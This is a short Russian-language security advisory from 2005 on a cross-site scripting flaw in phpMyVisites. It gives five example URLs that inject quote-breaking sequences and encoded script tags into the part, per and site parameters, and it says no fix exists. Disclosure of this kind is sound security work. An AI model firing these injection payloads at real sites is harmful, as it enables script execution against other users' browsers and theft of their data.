Межсайтовый скриптинг в phpMyVisites

Дата публикации:
28.04.2005
Всего просмотров:
937
Опасность:
Низкая
Наличие исправления:
Количество уязвимостей:
1
CVSSv2 рейтинг:
CVE ID:
Нет данных
Вектор эксплуатации:
Воздействие:
CWE ID:
Нет данных
Наличие эксплоита:
Нет данных
Уязвимые продукты:
Уязвимые версии: phpMyVisites

Описание:
Уязвимость позволяет удаленному пользователю произвести XSS нападение и получить доступ к потенциально важным данным других пользователей.

Удаленный пользователь может с помощью специально сформированного URL выполнить произвольный HTML сценарий в браузере жертвы в контексте безопасности уязвимого сайта. Примеры:

http://[target]/phpmyvisites/index.php?part=
"'/>[XSS]&stats=0

http://[target]/ph pmyvisites/index.php?part=
configurations&img=1&stats=1&date=2005
-04-23&oldd=2005-04-23&per=1'"/>
[xss]&site=1'"/>[xss]#ancre1

http://[target]/phpmyvisites/index.php?part=
%22'/%3E%3Cscript%3Ealert()%3C/scr
ipt%3E&stats=0

http://[target]/phpmyvisites/index.php?part=
configurations&img=1&stats=1&date=2005
-04-23&oldd=2005-04-23&per=1%22'/%
3E%3 Cscript%3Ealert()%3C/script%3E

http://[target]/phpmyvisites/index.php?part=
suivi&img=1&stats=1&date=2005-04-24&
oldd=2005-04-24&per=1&site=1'%22%3
E%3Cscript%3Ealert()%3C/ script%3E

URL производителя: www.phpmyvisites.net

Решение: Способов устранения уязвимости не существует в настоящее время.

Ссылки: phpMyVisites Input Validation Errors Let Remote Users Conduct Cross-Site Scripting Attacks

или введите имя

CAPTCHA